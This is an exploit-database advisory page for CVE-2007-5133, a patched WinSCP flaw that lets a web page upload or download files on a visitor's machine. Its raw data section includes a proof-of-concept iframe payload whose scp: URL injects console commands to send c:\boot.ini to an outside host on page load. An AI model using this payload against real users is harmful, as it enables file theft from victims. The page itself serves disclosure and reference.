header-logo
Suggest Exploit
vendor:
WinSCP
by:
SecurityFocus
8.8
CVSS
HIGH
Arbitrary File Upload/Download
434
CWE
Product Name: WinSCP
Affected Version From: Prior to WinSCP 4.0.4
Affected Version To: WinSCP 4.0.4
Patch Exists: YES
Related CWE: CVE-2007-5133
CPE: o:winscp:winscp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2007

WinSCP Arbitrary File Upload/Download

WinSCP is prone to a vulnerability that allows an attacker to upload or download arbitrary files from a victim's computer in the context of the vulnerable application. This is achieved by embedding an iframe in a web page with a malicious scp command that will execute when the page is loaded.

Mitigation:

Upgrade to WinSCP version 4.0.4 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25655/info

WinSCP is prone to a vulnerability that lets an attacker upload arbitrary files to a victim's computer or to download arbitrary files from the victim's computer in the context of the vulnerable application.

This issue affects versions prior to WinSCP 4.0.4.

<iframe src='scp:password@yourhost.com:" /console /command "option
confirm off" "put c:\boot.ini" close exit "'/>